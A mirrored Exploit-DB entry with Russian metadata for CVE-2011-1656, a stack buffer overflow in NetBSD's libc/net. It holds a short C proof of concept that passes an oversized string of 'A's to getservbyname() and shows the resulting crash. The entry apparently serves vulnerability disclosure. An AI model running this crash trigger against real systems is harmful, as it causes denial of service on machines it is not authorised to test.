- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 35919
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- MAKSYMILIAN ARCIEMOWICZ
- Тип уязвимости
- REMOTE
- Платформа
- BSD
- CVE
- cve-2011-1656
- Дата публикации
- 2011-07-01
		C:
	
	// source: https://www.securityfocus.com/bid/48528/info
NetBSD is prone to a stack-based buffer-overflow vulnerability affecting multiple functions in the 'libc/net' library.
Successful exploits may allow an attacker to execute arbitrary code in the context of the application using the affected library. Failed exploit attempts will result in a denial-of-service condition. 
/*
127# gcc -o grr grr.c && ./grr 6050
127# gcc -o grr grr.c && ./grr 6051
Memory fault (core dumped)
127#
*/
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
int main(int argc, char *argv[]){
	char *cycek;
	cycek=malloc(atoi(argv[1]));
	if(!cycek) return 1;
	memset(cycek,'A',atoi(argv[1]));
	getservbyname(cycek,"tcp");
	return 0;
}- Источник
- www.exploit-db.com
 
 
		